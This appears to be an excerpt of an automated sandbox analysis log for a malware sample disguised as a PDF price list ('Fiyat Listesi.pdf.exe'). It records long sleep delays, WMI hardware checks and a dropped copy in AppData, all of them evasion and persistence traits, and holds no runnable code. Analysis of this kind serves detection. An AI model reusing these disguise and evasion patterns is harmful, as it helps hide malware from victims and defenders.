                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe TID: 7992Thread sleep time: -2394093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep count: 40 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7404Thread sleep count: 3301 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7404Thread sleep count: 6552 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399367s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399262s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2399046s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398171s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2398062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397732s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397511s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2397046s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396834s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396593s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2396046s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395827s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395171s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2395062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394733s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394296s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394187s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394077s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 2104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7608Thread sleep count: 8056 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7608Thread sleep count: 1781 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399532s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397989s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397744s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396947s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396280s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394266s >= -30000s
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399883Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399638Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399531Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399422Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399312Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399203Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2399094Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398984Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398874Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398765Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398663Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398547Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398393Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398161Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2398031Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397921Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397812Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397703Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397594Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397484Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397375Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397264Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397156Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2397046Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396937Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396828Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396718Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396609Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396500Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396390Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396281Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396172Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2396047Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395828Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395718Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395424Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395297Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395187Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2395078Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394968Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394859Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394750Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394640Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394531Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394421Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394312Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394203Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 2394093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399367Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399262Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399046Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397732Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397511Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397046Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396834Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396046Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395827Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394733Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394406Jump to behavior
